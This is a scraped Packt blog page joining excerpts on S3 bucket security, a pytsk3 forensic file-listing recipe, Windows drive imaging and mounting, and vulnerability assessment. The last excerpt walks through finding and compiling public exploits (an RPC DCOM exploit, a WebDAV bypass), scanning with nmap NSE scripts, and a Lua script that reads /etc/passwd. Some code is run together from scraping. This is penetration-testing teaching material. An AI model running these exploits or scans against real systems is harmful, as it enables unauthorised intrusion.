AWS Console only. You can also enable cross-region replication so that the S3 bucket content can be replicated to the other selected regions. This option is mostly used when you want to deliver static content into two different regions, but it also gives you redundancy. For infrequently accessed data you can enable a lifecycle policy, which helps you to transfer the objects to a low-cost archival storage called Glacier. Let's see how to secure the S3 bucket using the AWS Console. To do this, we need to log in to the S3 bucket and search for S3. Now, click on the bucket you want to secure: In the screenshot, we have selected the bucket called velocis-manali-trip-112017 and, in the bucket properties, we can see that we have not enabled the security options that we have learned so far. Let's implement the security. Now, we need to click on the bucket and then on the Properties tab. From here, we can enable Versioning, Default encryption, Server access logging, and Object-level logging: To enable Server access logging, you need to specify the name of the bucket and a prefix for the logs: To enable encryption, you need to specify whether you want to use AES 256 or AWS KMS based encryption. Now, click on the Permission tab. From here, you will be able to define the Access Control List, Bucket Policy, and CORS configuration: In Access Control List, you can define who will access what and to what extent, in Bucket Policy you define resource-based permissions on the bucket (like we have seen in the example for bucket policy), and in CORS configuration we define the rule for CORS. Let's look at a sample CORS file: <!-- Sample policy --> <CORSConfiguration> <CORSRule> <AllowedOrigin>*</AllowedOrigin> <AllowedMethod>GET</AllowedMethod> <MaxAgeSeconds>3000</MaxAgeSeconds> <AllowedHeader>Authorization</AllowedHeader> </CORSRule> </CORSConfiguration> It's an XML script that allows read-only permission to all the origins. In the preceding code, instead of a URL, the origin is the wildcard *, which means anyone. Now, click on the Management section. From here, we define the life cycle rule, replication, and so on: In life cycle rules, an S3 bucket object is transferred to the Standard-IA tier after 30 days and transferred to Glacier after 60 days. This is how we define security on the S3 bucket. To summarize, we learned about security access and policies in Amazon S3. If you've enjoyed reading this, do check out this book, 'Cloud Security Automation' to know how private cloud security functions can be automated for better time and cost-effectiveness. Creating and deploying an Amazon Redshift cluster Amazon Sagemaker makes machine learning on the cloud easy How cybersecurity can help us secure cyberspace
Read more
  • 0
  • 0
  • 4355

article-image-working-forensic-evidence-container-recipes
Packt
07 Mar 2018
13 min read
Save for later

Working with Forensic Evidence Container Recipes

Packt
07 Mar 2018
13 min read
In this article by Preston Miller and Chapin Bryce, authors of Learning Python for Forensics, we introduce a recipe from our upcoming book, Python Digital Forensics Cookbook. In Python Digital Forensics Cookbook, each chapter is comprised of many scripts, or recipes, falling under specific themes. The "Iterating Through Files" recipe shown here, is from our chapter that introduces the Sleuth Kit's Python binding's, pystk3, and other libraries, to programmatically interact with forensic evidence containers. Specifically, this recipe shows how to access a forensic evidence container and iterate through all of its files to create an active file listing of its contents. (For more resources related to this topic, see here.) If you are reading this article, it goes without saying that Python is a key tool in DFIR investigations. However, most examiners, are not familiar with or do not take advantage of the Sleuth Kit's Python bindings. Imagine being able to run your existing scripts against forensic containers without needing to mount them or export loose files. This recipe continues to introduce the library, pytsk3, that will allow us to do just that and take our scripting capabilities to the next level. In this recipe, we learn how to recurse through the filesystem and create an active file listing. Oftentimes, one of the first questions we, as the forensic examiner, are asked is "What data is on the device?". An active file listing comes in handy here. Creating a file listing of loose files is a very straightforward task in Python. However, this will be slightly more complicated because we are working with a forensic image rather than loose files. This recipe will be a cornerstone for future scripts as it will allow us to recursively access and process every file in the image. As we continue to introduce new concepts and features from the Sleuth Kit, we will add new functionality to our previous recipes in an iterative process. In a similar way, this recipe will become integral in future recipes to iterate through directories and process files. Getting started Refer to the Getting started section in the Opening Acquisitions recipe for information on the build environment and setup details for pytsk3 and pyewf. All other libraries used in this script are present in Python's standard library. How to do it... We perform the following steps in this recipe: Import argparse, csv, datetime, os, pytsk3, pyewf, and sys; Identify if the evidence container is a raw (DD) image or an EWF (E01) container; Access the forensic image using pytsk3; Recurse through all directories in each partition; Store file metadata in a list; And write the active file list to a CSV. How it works... This recipe's command-line handler takes three positional arguments: EVIDENCE_FILE, TYPE, OUTPUT_CSV which represents the path to the evidence file, the type of evidence file, and the output CSV file, respectively. Similar to the previous recipe, the optional p switch can be supplied to specify a partition type. We use the os.path.dirname() method to extract the desired output directory path for the CSV file and, with the os.makedirs() function, create the necessary output directories if they do not exist. if __name__ == '__main__': # Command-line Argument Parser parser = argparse.ArgumentParser() parser.add_argument("EVIDENCE_FILE", help="Evidence file path") parser.add_argument("TYPE", help="Type of Evidence", choices=("raw", "ewf")) parser.add_argument("OUTPUT_CSV", help="Output CSV with lookup results") parser.add_argument("-p", help="Partition Type", choices=("DOS", "GPT", "MAC", "SUN")) args = parser.parse_args() directory = os.path.dirname(args.OUTPUT_CSV) if not os.path.exists(directory) and directory != "": os.makedirs(directory) Once we have validated the input evidence file by checking that it exists and is a file, the four arguments are passed to the main() function. If there is an issue with initial validation of the input, an error is printed to the console before the script exits. if os.path.exists(args.EVIDENCE_FILE) and os.path.isfile(args.EVIDENCE_FILE): main(args.EVIDENCE_FILE, args.TYPE, args.OUTPUT_CSV, args.p) else: print("[-] Supplied input file {} does not exist or is not a file".format(args.EVIDENCE_FILE)) sys.exit(1) In the main() function, we instantiate the volume variable with None to avoid errors referencing it later in the script. After printing a status message to the console, we check if the evidence type is an E01 to properly process it and create a valid pyewf handle as demonstrated in more detail in the Opening Acquisitions recipe. Refer to that recipe for more details as this part of the function is identical. The end result is the creation of the pytsk3 handle, img_info, for the user supplied evidence file. def main(image, img_type, output, part_type): volume = None print "[+] Opening {}".format(image) if img_type == "ewf": try: filenames = pyewf.glob(image) except IOError, e: print "[-] Invalid EWF format:n {}".format(e) sys.exit(2) ewf_handle = pyewf.handle() ewf_handle.open(filenames) # Open PYTSK3 handle on EWF Image img_info = ewf_Img_Info(ewf_handle) else: img_info = pytsk3.Img_Info(image) Next, we attempt to access the volume of the image using the pytsk3.Volume_Info() method by supplying it the image handle. If the partition type argument was supplied, we add its attribute ID as the second argument. If we receive an IOError when attempting to access the volume, we catch the exception as e and print it to the console. Notice, however, that we do not exit the script as we often do when we receive an error. We'll explain why in the next function. Ultimately, we pass the volume, img_info, and output variables to the openFS() method. try: if part_type is not None: attr_id = getattr(pytsk3, "TSK_VS_TYPE_" + part_type) volume = pytsk3.Volume_Info(img_info, attr_id) else: volume = pytsk3.Volume_Info(img_info) except IOError, e: print "[-] Unable to read partition table:n {}".format(e) openFS(volume, img_info, output) The openFS() method tries to access the filesystem of the container in two ways. If the volume variable is not None, it iterates through each partition, and if that partition meets certain criteria, attempts to open it. If, however, the volume variable is None, it instead tries to directly call the pytsk3.FS_Info() method on the image handle, img. As we saw, this latter method will work and give us filesystem access for logical images whereas the former works for physical images. Let's look at the differences between these two methods. Regardless of the method, we create a recursed_data list to hold our active file metadata. In the first instance, where we have a physical image, we iterate through each partition and check that is it greater than 2,048 sectors and does not contain the words "Unallocated", "Extended", or "Primary Table" in its description. For partitions meeting these criteria, we attempt to access its filesystem using the FS_Info() function by supplying the pytsk3 img object and the offset of the partition in bytes. If we are able to access the filesystem, we use to open_dir() method to get the root directory and pass that, along with the partition address ID, the filesystem object, two empty lists, and an empty string, to the recurseFiles() method. These empty lists and string will come into play in recursive calls to this function as we will see shortly. Once the recurseFiles() method returns, we append the active file metadata to the recursed_data list. We repeat this process for each partition def openFS(vol, img, output): print "[+] Recursing through files.." recursed_data = [] # Open FS and Recurse if vol is not None: for part in vol: if part.len > 2048 and "Unallocated" not in part.desc and "Extended" not in part.desc and "Primary Table" not in part.desc: try: fs = pytsk3.FS_Info(img, offset=part.start*vol.info.block_size) except IOError, e: print "[-] Unable to open FS:n {}".format(e) root = fs.open_dir(path="/") data = recurseFiles(part.addr, fs, root, [], [], [""]) recursed_data.append(data) We employ a similar method for the second instance, where we have a logical image, where the volume is None. In this case, we attempt to directly access the filesystem and, if successful, we pass that to the recurseFiles() method and append the returned data to our recursed_data list. Once we have our active file list, we send it and the user supplied output file path to the csvWriter() method. Let's dive into the recurseFiles() method which is the meat of this recipe. else: try: fs = pytsk3.FS_Info(img) except IOError, e: print "[-] Unable to open FS:n {}".format(e) root = fs.open_dir(path="/") data = recurseFiles(1, fs, root, [], [], [""]) recursed_data.append(data) csvWriter(recursed_data, output) The recurseFiles() function is based on an example of the FLS tool (https://github.com/py4n6/pytsk/blob/master/examples/fls.py) and David Cowen's Automating DFIR series tool dfirwizard (https://github.com/dlcowen/dfirwizard/blob/master/dfirwiza rd-v9.py). To start this function, we append the root directory inode to the dirs list. This list is used later to avoid unending loops. Next, we begin to loop through each object in the root directory and check that it has certain attributes we would expect and that its name is not either "." or "..". def recurseFiles(part, fs, root_dir, dirs, data, parent): dirs.append(root_dir.info.fs_file.meta.addr) for fs_object in root_dir: # Skip ".", ".." or directory entries without a name. if not hasattr(fs_object, "info") or not hasattr(fs_object.info, "name") or not hasattr(fs_object.info.name, "name") or fs_object.info.name.name in [".", ".."]: continue If the object passes that test, we extract its name using the info.name.name attribute. Next, we use the parent variable, which was supplied as one of the function's inputs, to manually create the file path for this object. There is no built-in method or attribute to do this automatically for us. We then check if the file is a directory or not and set the f_type variable to the appropriate type. If the object is a file, and it has an extension, we extract it and store it in the file_ext variable. If we encounter an AttributeError when attempting to extract this data we continue onto the next object. try: file_name = fs_object.info.name.name file_path = "{}/{}".format("/".join(parent), fs_object.info.name.name) try: if fs_object.info.meta.type == pytsk3.TSK_FS_META_TYPE_DIR: f_type = "DIR" file_ext = "" else: f_type = "FILE" if "." in file_name: file_ext = file_name.rsplit(".")[-1].lower() else: file_ext = "" except AttributeError: continue We create variables for the object size and timestamps. However, notice that we pass the dates to a convertTime() method. This function exists to convert the UNIX timestamps into a human-readable format. With these attributes extracted, we append them to the data list using the partition address ID to ensure we keep track of which partition the object is from size = fs_object.info.meta.size create = convertTime(fs_object.info.meta.crtime) change = convertTime(fs_object.info.meta.ctime) modify = convertTime(fs_object.info.meta.mtime) data.append(["PARTITION {}".format(part), file_name, file_ext, f_type, create, change, modify, size, file_path]) If the object is a directory, we need to recurse through it to access all of its sub-directories and files. To accomplish this, we append the directory name to the parent list. Then, we create a directory object using the as_directory() method. We use the inode here, which is for all intents and purposes a unique number and check that the inode is not already in the dirs list. If that were the case, then we would not process this directory as it would have already been processed. If the directory needs to be processed, we call the recurseFiles() method on the new sub_directory and pass it current dirs, data, and parent variables. Once we have processed a given directory, we pop that directory from the parent list. Failing to do this will result in false file path details as all of the former directories will continue to be referenced in the path unless removed. Most of this function was under a large try-except block. We pass on any IOError exception generated during this process. Once we have iterated through all of the subdirectories, we return the data list to the openFS() function. if f_type == "DIR": parent.append(fs_object.info.name.name) sub_directory = fs_object.as_directory() inode = fs_object.info.meta.addr # This ensures that we don't recurse into a directory # above the current level and thus avoid circular loops. if inode not in dirs: recurseFiles(part, fs, sub_directory, dirs, data, parent) parent.pop(-1) except IOError: pass dirs.pop(-1) return data Let's briefly look at the convertTime() function. We've seen this type of function before, if the UNIX timestamp is not 0, we use the datetime.utcfromtimestamp() method to convert the timestamp into a human-readable format. def convertTime(ts): if str(ts) == "0": return "" return datetime.utcfromtimestamp(ts) With the active file listing data in hand, we are now ready to write it to a CSV file using the csvWriter() method. If we did find data (i.e., the list is not empty), we open the output CSV file, write the headers, and loop through each list in the data variable. We use the csvwriterows() method to write each nested list structure to the CSV file. def csvWriter(data, output): if data == []: print "[-] No output results to write" sys.exit(3) print "[+] Writing output to {}".format(output) with open(output, "wb") as csvfile: csv_writer = csv.writer(csvfile) headers = ["Partition", "File", "File Ext", "File Type", "Create Date", "Modify Date", "Change Date", "Size", "File Path"] csv_writer.writerow(headers) for result_list in data: csv_writer.writerows(result_list) The screenshot below demonstrates the type of data this recipe extracts from forensic images. There's more... For this recipe, there are a number of improvements that could further increase its utility: Use tqdm, or another library, to create a progress bar to inform the user of the current execution progress. Learn about the additional metadata values that can be extracted from filesystem objects using pytsk3 and add them to the output CSV file. Summary In summary, we have learned how to use pytsk3 to recursively iterate through any supported filesystem by the Sleuth Kit. This comprises the basis of how we can use the Sleuth Kit to programmatically process forensic acquisitions. With this recipe, we will now be able to further interact with these files in future recipes. Resources for Article:   Further resources on this subject: [article] [article] [article]
Read more
  • 0
  • 0
  • 5270
article-image-windows-drive-acquisition
Packt
21 Jul 2017
13 min read
Save for later

Windows Drive Acquisition

Packt
21 Jul 2017
13 min read
In this article, by Oleg Skulkin and Scar de Courcier, authors of Windows Forensics Cookbook, we  will cover drive acquisition in E01 format with FTK Imager, drive acquisition in RAW Format with DC3DD, and mounting forensic images with Arsenal Image Mounter. (For more resources related to this topic, see here.) Before you can begin analysing evidence from a source, it first of all, needs to be imaged. This describes a forensic process in which an exact copy of a drive is taken. This is an important step, especially if evidence needs to be taken to court because forensic investigators must be able to demonstrate that they have not altered the evidence in any way. The term forensic image can refer to either a physical or a logical image. Physical images are precise replicas of the drive they are referencing, whereas a logical image is a copy of a certain volume within that drive. In general, logical images show what the machine’s user will have seen and dealt with, whereas physical images give a more comprehensive overview of how the device works at a higher level. A hash value is generated to verify the authenticity of the acquired image. Hash values are essentially cryptographic digital fingerprints which show whether a particular item is an exact copy of another. Altering even the smallest bit of data will generate a completely new hash value, thus demonstrating that the two items are not the same. When a forensic investigator images a drive, they should generate a hash value for both the original drive and the acquired image. Some pieces of forensic software will do this for you. There are a number of tools available for imaging hard drives, some of which are free and open source. However, the most popular way for forensic analysts to image hard drives is by using one of the more well-known forensic software vendors solutions. This is because it is imperative to be able to explain how the image was acquired and its integrity, especially if you are working on a case that will be taken to court. Once you have your image, you will then be able to analyse the digital evidence from a device without directly interfering with the device itself. In this chapter, we will be looking at various tools that can help you to image a Windows drive, and taking you through the process of acquisition. Drive acquisition in E01 format with FTK Imager FTK Imager is an imaging and data preview tool by AccessData, which allows an examiner not only to create forensic images in different formats, including RAW, SMART, E01 and AFF, but also to preview data sources in a forensically sound manner. In the first recipe of this article, we will show you how to create a forensic image of a hard drive from a Windows system in E01 format. E01 or EnCase's Evidence File is a standard format for forensic images in law enforcement. Such images consist of a header with case info, including acquisition date and time, examiner's name, acquisition notes, and password (optional), bit-by-bit copy of an acquired drive (consists of data blocks, each is verified with its own CRC or Cyclical Redundancy Check), and a footer with MD5 hash for the bitstream.  Getting ready First of all, let's download FTK Imager from AccessData website. To do it, go to SOLUTIONS tab, and after - to Product Downloads. Now choose DIGITAL FORENSICS, and after - FTK Imager. At the time of this writing, the most up-to-date version is 3.4.3, so click DOWNLOAD PAGE green button on the right. Ok, now you should be at the download page. Click on DOWNLOAD NOW button and fill in the form, after this you'll get the download link to the email you provided. The installation process is quite straightforward, all you need is just click Next a few times, so we won't cover it in the recipe. How to do it... There are two ways of initiating drive imaging process: Using Create Disk Image button from the Toolbar as shown in the following figure: Create Disk Image button on the Toolbar Use Create Disk Image option from the File menu as shown in the following figure: Create Disk Image... option in the File Menu You can choose any option you like. The first window you see is Select Source. Here you have five options: Physical Drive: This allows you to choose a physical drive as the source, with all partitions and unallocated space Logical Drive: This allows you to choose a logical drive as the source, for example, E: drive Image File: This allows you to choose an image file as the source, for example, if you need to convert you forensic image from one format to another Contents of a Folder: This allows you to choose a folder as the source, of course, no deleted files, and so on will be included Fernico Device: This allows you to restore images from multiple CD/DVD Of course, we want to image the whole drive to be able to work with deleted data and unallocated space, so: Let's choose Physical Drive option. Evidence source mustn't be altered in any way, so make sure you are using a hardware write blocker, you can use the one from Tableau, for example. These devices allow acquisition of  drive contents without creating the possibility of modifying the data.  FTK Imager Select Source window Click Next and you'll see the next window - Select Drive. Now you should choose the source drive from the drop down menu, in our case it's .PHYSICALDRIVE2. FTK Imager Select Drive window Ok, the source drive is chosen, click Finish. Next window - Create Image. We'll get back to this window soon, but for now, just click Add...  It's time to choose the destination image type. As we decided to create our image in EnCase's Evidence File format, let's choose E01. FTK Imager Select Image Type window Click Next and you'll see Evidence Item Information window. Here we have five fields to fill in: Case Number, Evidence Number, Unique Description, Examiner and Notes. All fields are optional. FTK Imager Evidence Item Information window Filled the fields or not, click Next. Now choose image destination. You can use Browse button for it. Also, you should fill in image filename. If you want your forensic image to be split, choose fragment size (in megabytes). E01 format supports compression, so if you want to reduce the image size, you can use this feature, as you can see in the following figure, we have chosen 6. And if you want the data in the image to be secured, use AD Encryption feature. AD Encryption is a whole image encryption, so not only is the raw data encrypted, but also any metadata. Each segment or file of the image is encrypted with a randomly generated image key using AES-256. FTK Imager Select Image Destination window Ok, we are almost done. Click Finish and you'll see Create Image window again. Now, look at three options at the bottom of the window. The verification process is very important, so make sure Verify images after they are created option is ticked, it helps you to be sure that the source and the image are equal. Precalculate Progress Statistics option is also very useful: it will show you estimated time of arrival during the imaging process. The last option will create directory listings of all files in the image for you, but of course, it takes time, so use it only if you need it.  FTK Imager Create Image window All you need to do now is to click Start. Great, the imaging process has been started! When the image is created, the verification process starts. Finally, you'll get Drive/Image Verify Results window, like the one in the following figure: FTK Imager Drive/Image Verify Results window As you can see, in our case the source and the image are identical: both hashes matched. In the folder with the image, you will also find an info file with valuable information such as drive model, serial number, source data size, sector count, MD5 and SHA1 checksums, and so on. How it works... FTK Imager uses the physical drive of your choice as the source and creates a bit-by-bit image of it in EnCase's Evidence File format. During the verification process, MD5 and SHA1 hashes of the image and the source are being compared. See more FTK Imager download page: http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.4.3 FTK Imager User Guide: https://ad-pdf.s3.amazonaws.com/Imager/3_4_3/FTKImager_UG.pdf Drive acquisition in RAW format with DC3DD DC3DD is a patched (by Jesse Kornblum) version of classic GNU DD utility with some computer forensics features. For example, the fly hashing with a number of algorithms, such as MD5, SHA-1, SHA-256, and SHA-512, showing the progress of the acquisition process, and so on. Getting ready You can find a compiled stand alone 64 bit version of DC3DD for Windows at Sourceforge. Just download the ZIP or 7z archive, unpack it, and you are ready to go. How to do it... Open Windows Command Prompt and change directory (you can use cd command to do it) to the one with dc3dd.exe, and type the following command: dc3dd.exe if=.PHYSICALDRIVE2 of=X:147-2017.dd hash=sha256 log=X:147-2017.log Press Enter and the acquisition process will start. Of course, your command will be a bit different, so let's find out what each part of it means: if: It stands for input file, yes, originally DD is a Linux utility, and, if you don't know, everything is a file in Linux, as you can see in our command, we put physical drive 2 here (this is the drive we wanted to image, but in your case it can be another drive, depend on the number of drives connected to your workstation). of: It stands for output file, here you should type the destination of your image, as you remember, in RAW format, in our case it's X: drive and 147-2017.dd file. hash: As it's already been said, DC3DD supports four hashing algorithms: MD5, SHA-1, SHA-256, and SHA-512, we chose SHA-256, but you can choose the one you like. log: Here you should type the destination for the logs, you will find the image version, image hash, and so on in this file after acquisition is completed. How it works... DC3DD creates bit-by-bit image of the source drive n RAW format, so the size of the image will be the same as source, and calculates the image hash using the algorithm of the examiner's choice, in our case SHA-256. See also DC3DD download page: https://sourceforge.net/projects/dc3dd/files/dc3dd/7.2%20-%20Windows/ Mounting forensic images with Arsenal Image Mounter Arsenal Image Mounter is an open source tool developed by Arsenal Recon. It can help a digital forensic examiner to mount a forensic image or virtual machine disk in Windows. It supports both E01 (and Ex01) and RAW forensic images, so you can use it with any of the images we created in the previous recipes. It's very important to note, that Arsenal Image Mounter mounts the contents of disk images as complete disks. The tool supports all file systems you can find on Windows drives: NTFS, ReFS, FAT32 and exFAT. Also, it has temporary write support for images and it's very useful feature, for example, if you want to boot system from the image you are examining. Getting ready Go to Arsenal Image Mounter web page at Arsenal Recon website and click on Download button to download the ZIP archive. At the time of this writing the latest version of the tool is 2.0.010, so in our case, the archive has the name  Arsenal_Image_Mounter_v2.0.010.0_x64.zip. Extract it to a location of your choice and you are ready to go, no installation is needed. How to do it... There two ways to choose an image for mounting in Arsenal Image Mounter: You can use File menu and choose Mount image. Use the Mount image button as shown in the following figure:  Arsenal Image Mounter main window When you choose Mount image option from File menu or click on Mount image button, Open window will popup - here you should choose an image for mounting. The next windows you will see - Mount options, like the one in the following figure:  Arsenal Image Mounter Mount options window As you can see, there are a few options here: Read only: If you choose this option, the image is mounted in read-only mode, so no write operations are allowed (Do you still remember that you mustn't alter the evidence in any way? Of course, it's already an image, not the original drive, but nevertheless).Fake disk signatures: If an all-zero disk signature is found on the image, Arsenal Image Mounter reports a random disk signature to Windows, so it's mounted properly. Write temporary: If you choose this option, the image is mounted in read-write mode, but all modifications are written not in the original image file, but to a temporary differential file. Write original: Again, this option mounts the image in read-write mode, but this time the original image file will be modified. Sector size: This option allows you to choose sector size. Create "removable" disk device: This option emulates the attachment of a USB thumb drive.   Choose the options you think you need and click OK. We decided to mount our image as read only. Now you can see a hard drive icon on the main windows of the tool - the image is mounted. If you mounted only one image and want to unmount it- select the image and click on Remove selected button. If you have a few mounted images and want to unmount all of them - click on Remove all button. How it works... Arsenal Image Mounter mounts forensic images or virtual machine disks as complete disks in read-only or read-write mode. Later, a digital forensics examiner can access their contents even with Windows Explorer. See also Arsenal Image Mounter page at Arsenal Recon website: https://arsenalrecon.com/apps/image-mounter/ Summary In this article, the author has explained about the process and importance of drive acquisition using imaging software's which are available with well-known forensic software vendors such as FTK Imager and DC3DD. Drive acquisition being the first step in the analysis of digital evidence, need to be carried out with utmost care which in turn will make the analysis process smooth. Resources for Article: Further resources on this subject: Forensics Recovery [article] Digital and Mobile Forensics [article] Mobile Forensics and Its Challanges [article]
Read more
  • 0
  • 0
  • 5588

article-image-vulnerability-assessment
Packt
21 Jul 2017
11 min read
Save for later

Vulnerability Assessment

Packt
21 Jul 2017
11 min read
"Finding a risk is learning, Ability to identify risk exposure is a skill and exploiting it is merely a choice" In this article by Vijay Kumar Velu, the author of the book Mastering Kali Linux for Advanced Penetration Testing - Second Edition, we will learn about vulnerability assessment. The goal of passive and active reconnaissance is to identify the exploitable target and vulnerability assessment is to find the security flaws that are most likely to support the tester's or attacker's objective (denial of service, theft, or modification of data). The vulnerability assessment during the exploit phase of the kill chain focuses on creating the access to achieve the objective—mapping of the vulnerabilities to line up the exploits to maintain the persistent access to the target. Thousands of exploitable vulnerabilities have been identified, and most are associated with at least one proof-of-concept code or technique to allow the system to be compromised. Nevertheless, the underlying principles that govern success are the same across networks, operating systems, and applications. In this article, you will learn: Using online and local vulnerability resources Vulnerability scanning with nmap Vulnerability nomenclature Vulnerability scanning employs automated processes and applications to identify vulnerabilities in a network, system, operating system, or application that may be exploitable. When performed correctly, a vulnerability scan delivers an inventory of devices (both authorized and rogue devices); known vulnerabilities that have been actively scanned for, and usually a confirmation of how compliant the devices are with various policies and regulations. Unfortunately, vulnerability scans are loud—they deliver multiple packets that are easily detected by most network controls and make stealth almost impossible to achieve. They also suffer from the following additional limitations: For the most part, vulnerability scanners are signature based—they can only detect known vulnerabilities, and only if there is an existing recognition signature that the scanner can apply to the target. To a penetration tester, the most effective scanners are open source and they allow the tester to rapidly modify code to detect new vulnerabilities. Scanners produce large volumes of output, frequently containing false-positive results that can lead a tester astray; in particular, networks with different operating systems can produce false-positives with a rate as high as 70 percent. Scanners may have a negative impact on the network—they can create network latency or cause the failure of some devices (refer to the Network Scanning Watch List at www.digininja.org, for devices known to fail as a result of vulnerability testing). In certain jurisdictions, scanning is considered as hacking, and may constitute an illegal act. There are multiple commercial and open source products that perform vulnerability scans. Local and online vulnerability databases Together, passive and active reconnaissance identifies the attack surface of the target, that is, the total number of points that can be assessed for vulnerabilities. A server with just an operating system installed can only be exploited if there are vulnerabilities in that particular operating system; however, the number of potential vulnerabilities increases with each application that is installed. Penetration testers and attackers must find the particular exploits that will compromise known and suspected vulnerabilities. The first place to start the search is at vendor sites; most hardware and application vendors release information about vulnerabilities when they release patches and upgrades. If an exploit for a particular weakness is known, most vendors will highlight this to their customers. Although their intent is to allow customers to test for the presence of the vulnerability themselves, attackers and penetration testers will take advantage of this information as well. Other online sites that collect, analyze, and share information about vulnerabilities are as follows: The National vulnerability database that consolidates all public vulnerability data released by the US Government available at http://web.nvd.nist.gov/view/vuln/search Secunia available at http://secunia.com/community/ Open Source Vulnerability Database Project (OSVDP) available at http://www.osvdb.org/search/advsearch Packetstorm security available at http://packetstormsecurity.com/ SecurityFocus available at http://www.securityfocus.com/vulnerabilities Inj3ct0r available at http://1337day.com/ The Exploit database maintained by Offensive Security available at http://www.db-exploit.com The Exploit database is also copied locally to Kali and it can be found in the /usr/share/exploitdb directory. Before using it, make sure that it has been updated using the following command: cd /usr/share/exploitdb wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjfarchive.tar.bz2 rmarchive.tar.bz2 To search the local copy of exploitdb, open a Terminal window and enter searchsploit and the desired search term(s) in the Command Prompt. This will invoke a script that searches a database file (.csv) that contains a list of all exploits. The search will return a description of known vulnerabilities as well as the path to a relevant exploit. The exploit can be extracted, compiled, and run against specific vulnerabilities. Take a look at the following screenshot, which shows the description of the vulnerabilities: The search script scans for each line in the CSV file from left to right, so the order of the search terms is important—a search for Oracle 10g will return several exploits, but 10g Oracle will not return any. Also, the script is weirdly case sensitive; although you are instructed to use lower case characters in the search term, a search for bulletproof FTP returns no hits, but bulletproof FTP returns seven hits, and bulletproof FTP returns no hits. More effective searches of the CSV file can be conducted using the grep command or a search tool such as KWrite (apt-get install kwrite). A search of the local database may identify several possible exploits with a description and a path listing; however, these will have to be customized to your environment, and then compiled prior to use. Copy the exploit to the /tmp directory (the given path does not take into account that the /windows/remote directory resides in the /platforms directory). Exploits presented as scripts such as Perl, Ruby, and PHP are relatively easy to implement. For example, if the target is a Microsoft II 6.0 server that may be vulnerable to a WebDAV remote authentication bypass, copy the exploit to the root directory and then execute as a standard Perl script, as shown in the following screenshot: Many of the exploits are available as source code that must be compiled before use. For example, a search for RPC-specific vulnerabilities identifies several possible exploits. An excerpt is shown in the following screenshot: The RPC DCOM vulnerability identified as 76.c is known from practice to be relatively stable. So we will use it as an example. To compile this exploit, copy it from the storage directory to the /tmp directory. In that location, compile it using GCC with the command as follows: root@kali:~# gcc76.c -o 76.exe This will use the GNU Compiler Collection application to compile 76.c to a file with the output (-o) name of 76.exe, as shown in the following screenshot: When you invoke the application against the target, you must call the executable (which is not stored in the /tmp directory) using a symbolic link as follows: root@kali:~# ./76.exe The source code for this exploit is well documented and the required parameters are clear at the execution, as shown in the following screenshot: Unfortunately, not all exploits from exploit database and other public sources compiled as readily as 76.c. There are several issues that make the use of such exploits problematic, even dangerous, for penetration testers listed as follows: Deliberate errors or incomplete source code are commonly encountered as experienced developers attempt to keep exploits away from inexperienced users, especially beginners who are trying to compromise systems without knowing the risks that go with their actions. Exploits are not always sufficiently documented; after all, there is no standard that governs the creation and use of code intended to be used to compromise a data system. As a result, they can be difficult to use, particularly for testers who lack expertise in application development. Inconsistent behaviors due to changing environments (new patches applied to the target system and language variations in the target application) may require significant alterations to the source code; again, this may require a skilled developer. There is always the risk of freely available code containing malicious functionalities. A penetration tester may think that they are conducting a proof of concept (POC) exercise and will be unaware that the exploit has also created a backdoor in the application being tested that could be used by the developer. To ensure consistent results and create a community of coders who follow consistent practices, several exploit frameworks have been developed. The most popular exploitation framework is the Metasploit framework. Vulnerability scanning with nmap There are no security operating distributions without nmap, so far we have discussed how to utilize nmap during active reconnaissance, but attackers don't just use nmap to find open ports and services, but also engage the nmap to perform the vulnerability assessment. As of 10 March 2017, the latest version of nmap is 7.40 and it ships with 500+ NSE (nmap scripting engine) scripts, as shown in the following screenshot: Penetration testers utilize nmap's most powerful and flexible features, which allows them to write their own scripts and also automate them to ease the exploitation. Primarily the NSE was developed for the following reasons: Network discovery: Primary purpose that attackers would utilize the nmap is for the network discovery. Classier version detection of a service: There are 1000's of services with multiple version details to the same service, so make it more sophisticated. Vulnerability detection: To automatically identify vulnerability in a vast network range; however, nmap itself cannot be a fully vulnerability scanner in itself. Backdoor detection: Some of the scripts are written to identify the pattern if there are any worms infections on the network, it makes the attackers job easy to narrow down and focus on taking over the machine remotely. Vulnerability exploitation: Attackers can also potentially utilize nmap to perform exploitation in combination with other tools such as Metasploit or write a custom reverse shell code and combine nmap's capability of exploitation. Before firing the nmap to perform the vulnerability scan, penetration testers must update the nmap script db to see if there are any new scripts added to the database so that they don't miss the vulnerability identification: nmap –script-updatedb Running for all the scripts against the target host: nmap-T4 -A -sV -v3 -d –oATargetoutput --script all --script-argsvulns.showalltarget.com Introduction to LUA scripting Light weight embeddable scripting language, which is built on top of the C programming language, was created in Brazil in 1993 and is still actively developed. It is a powerful and fast programming language mostly used in gaming applications and image processing. Complete source code, manual, plus binaries for some platforms do not go beyond 1.44 MB (which is less than a floppy disk). Some of the security tools that are developed in LUA are nmap, Wireshark, and Snort 3.0. One of the reasons why LUA is chosen to be the scripting language in Information security is due to the compactness, no buffer overflows and format string vulnerabilities, and it can be interpreted. LUA can be installed directly to Kali Linux by issuing the apt-get install lua5.1 command on the Terminal. The following code extract is the sample script to read the file and print the first line: #!/usr/bin/lua local file = io.open("/etc/passwd", "r") contents = file:read() file:close() print (contents) LUA is similar to any other scripting such as bash and PERL scripting. The preceding script should produce the output as shown in the following screenshot: Customizing NSE scripts In order to achieve maximum effectiveness, customization of scripts helps penetration testers in finding the right vulnerabilities within the given span of time. However, attackers do not have the time limit. The following code extract is a LUANSE script to identify a specific file location that we will search on the entire subnet using nmap: local http=require 'http' description = [[ This is my custom discovery on the network ]] categories = {"safe","discovery"} require("http") functionportrule(host, port) returnport.number == 80 end function action(host, port) local response response = http.get(host, port, "/test.txt") ifresponse.status and response.status ~= 404 then return "successful" end end Save the file into the /usr/share/nmap/scripts/ folder. Finally, your script is ready to be tested as shown in the following screenshot; you must be able to run your own NSE script without any problems: To completely understand the preceding NSE script here is the description of what is in the code: local http: requires HTTP – calling the right library from the LUA, the line calls the HTTP script and made it a local request. Description: Where testers/researchers can enter the description of the script. Categories: This typically has two variables, where one declares whether it is safe or intrusive.  
Read more
  • 0
  • 0
  • 2317